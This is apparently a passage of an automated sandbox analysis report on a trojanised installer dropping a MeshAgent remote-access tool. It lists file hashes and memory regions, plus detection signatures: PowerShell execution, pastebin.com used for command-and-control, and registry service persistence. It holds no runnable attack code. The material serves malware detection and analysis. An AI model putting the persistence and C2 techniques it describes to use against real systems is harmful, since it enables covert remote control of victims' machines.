SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\jfxrt.jar

MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Roaming\Installer\lib\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

C:\Users\Admin\AppData\Roaming\Installer\lib\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar

MD5 bd1f1a2246004487d4c84a233cea37f7
SHA1 24b9e6f765da1bcd2d424fd28b68fc40e368520e
SHA256 5183a2bca7735453b7fd5ca57ebb47ad32dd82d830eaddafed50a658164bdd76
SHA512 800e6a5dd529e9627320c7989720c0086a76ca7fbca6d3ccfcfea04871017a0f212926ccf3b4c16c958615e5ca0db19a53ccee53f17034384eb8c9c933e7608c

C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

memory/1792-308-0x0000000000150000-0x0000000000151000-memory.dmp

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zend-ext.jar

MD5 4bc2aea7281e27bc91566377d0ed1897
SHA1 d02d897e8a8aca58e3635c009a16d595a5649d44
SHA256 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288
SHA512 da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-xml-ext.jar

MD5 0a79304556a1289aa9e6213f574f3b08
SHA1 7ee3bde3b1777bf65d4f62ce33295556223a26cd
SHA256 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79
SHA512 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\currency.data

MD5 f6258230b51220609a60aa6ba70d68f3
SHA1 b5b95dd1ddcd3a433db14976e3b7f92664043536
SHA256 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441
SHA512 b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

C:\Users\Admin\AppData\Roaming\Installer\lib\zt-zip.jar

MD5 0fd8bc4f0f2e37feb1efc474d037af55
SHA1 add8fface4c1936787eb4bffe4ea944a13467d53
SHA256 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b
SHA512 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-simple.jar

MD5 722bb90689aecc523e3fe317e1f0984b
SHA1 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e
SHA256 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874
SHA512 d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-api.jar

MD5 caafe376afb7086dcbee79f780394ca3
SHA1 da76ca59f6a57ee3102f8f9bd9cee742973efa8a
SHA256 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79
SHA512 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\security\java.security

MD5 409c132fe4ea4abe9e5eb5a48a385b61
SHA1 446d68298be43eb657934552d656fa9ae240f2a2
SHA256 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583
SHA512 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jsse.jar

MD5 fd1434c81219c385f30b07e33cef9f30
SHA1 0b5ee897864c8605ef69f66dfe1e15729cfcbc59
SHA256 bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5
SHA512 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

\Users\Admin\AppData\Roaming\Installer\jre\bin\net.dll

MD5 691b937a898271ee2cffab20518b310b
SHA1 abedfcd32c3022326bc593ab392dea433fcf667c
SHA256 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61
SHA512 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\nio.dll

MD5 95edb3cb2e2333c146a4dd489ce67cbd
SHA1 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a
SHA256 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31
SHA512 ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzdb.dat

MD5 5a7f416bd764e4a0c2deb976b1d04b7b
SHA1 e12754541a58d7687deda517cdda14b897ff4400
SHA256 a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d
SHA512 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzmappings

MD5 b8dd8953b143685b5e91abeb13ff24f0
SHA1 b5ceb39061fce39bb9d7a0176049a6e2600c419c
SHA256 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272
SHA512 c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

C:\Users\Admin\AppData\Roaming\Installer\jre\lib\resources.jar

MD5 9a084b91667e7437574236cd27b7c688
SHA1 d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1
SHA256 a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d
SHA512 d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr120.dll

MD5 034ccadc1c073e4216e9466b720f9849
SHA1 f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA256 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA512 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcp120.dll

MD5 fd5cabbe52272bd76007b68186ebaf00
SHA1 efd1e306c1092c17f6944cc6bf9a1bfad4d14613
SHA256 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
SHA512 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\prism_d3d.dll

MD5 5aadadf700c7771f208dda7ce60de120
SHA1 e9cf7e7d1790dc63a58106c416944fd6717363a5
SHA256 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79
SHA512 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2

memory/1792-366-0x0000000000210000-0x000000000021A000-memory.dmp

memory/1792-365-0x0000000000210000-0x000000000021A000-memory.dmp

memory/1792-367-0x0000000000210000-0x000000000021A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\prism_sw.dll

MD5 5e6ddf7cf25fd493b8a1a769ef4c78f7
SHA1 42748051176b776467a31885bb2889c33b780f2d
SHA256 b9beaca57bff23c953917c0b2037351ef3334e6a9de447dca6542fe5c815bf9f
SHA512 c47f742f064b99e5b9c2bdeac97472d9d8c9466c9071e9799af79f820199d9b30b198c33ef635f07a972b77475afea9e7417aa6335d22a7380e7b0e552869c18

C:\Users\Admin\AppData\Roaming\Installer\jre\bin\glass.dll

MD5 434cbb561d7f326bbeffa2271ecc1446
SHA1 3d9639f6da2bc8ac5a536c150474b659d0177207
SHA256 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143
SHA512 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

memory/1792-371-0x0000000000150000-0x0000000000151000-memory.dmp

memory/1792-377-0x0000000000150000-0x0000000000151000-memory.dmp

memory/1792-380-0x0000000000150000-0x0000000000151000-memory.dmp

\Users\Admin\AppData\Roaming\Installer\jre\bin\javafx_font.dll

MD5 aeada06201bb8f5416d5f934aaa29c87
SHA1 35bb59febe946fb869e5da6500ab3c32985d3930
SHA256 f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3
SHA512 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78

memory/1792-394-0x0000000000150000-0x0000000000151000-memory.dmp

memory/1792-396-0x0000000000150000-0x0000000000151000-memory.dmp

memory/1792-416-0x0000000000150000-0x0000000000151000-memory.dmp

memory/1792-420-0x0000000000150000-0x0000000000151000-memory.dmp

memory/400-421-0x0000000000100000-0x00000000001EE000-memory.dmp

memory/2808-422-0x00000000009A0000-0x0000000000CED000-memory.dmp

memory/2808-506-0x00000000009A0000-0x0000000000CED000-memory.dmp

C:\Program Files (x86)\pdfFiller\pdfFiller.exe

MD5 46d083e25c4d49f928d3b025ba1e00f6
SHA1 02e7f5c91749bd65290e01c5ee0fba151e8e3682
SHA256 ccb88594f2495e896c6b3c01cc1dd5838779cea06687d41ae64037471d551c2f
SHA512 88416aad10975f25d471f63e908be09b50752a6806a8b8ac28ba096cf1b78aa179a975ac0519582667ed8e9b7a92d290dc9c20a50a6fbbc2f00397aaeb8e445d

memory/1636-509-0x0000000000170000-0x0000000000468000-memory.dmp

memory/1636-510-0x00000000050F0000-0x0000000005854000-memory.dmp

memory/1636-511-0x0000000000840000-0x0000000000890000-memory.dmp

memory/1636-512-0x0000000000B00000-0x0000000000B76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC286.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarC299.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2808-528-0x00000000009A0000-0x0000000000CED000-memory.dmp

memory/400-536-0x0000000000100000-0x00000000001EE000-memory.dmp

memory/1636-618-0x0000000002410000-0x0000000002434000-memory.dmp

memory/1636-619-0x0000000007610000-0x00000000076C2000-memory.dmp

memory/1636-622-0x0000000002660000-0x000000000266C000-memory.dmp

memory/1636-623-0x0000000002670000-0x0000000002678000-memory.dmp

memory/1636-624-0x0000000002680000-0x0000000002688000-memory.dmp

memory/1636-625-0x00000000047D0000-0x00000000047EA000-memory.dmp

memory/1636-626-0x0000000004880000-0x00000000048A4000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-14 02:10

Reported

2024-10-14 02:13

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e8c90ed9b9acf1f82a0823c676420ac365d06b8399a91cb23a5ef535a49c2f7f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
N/A N/A C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\bcrypt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\apphelp.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wgdi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\combase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\comctl32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\oleaut32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ole32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\shcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\ntasn1.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\crypt32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\MeshService.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\dll\ws2_32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
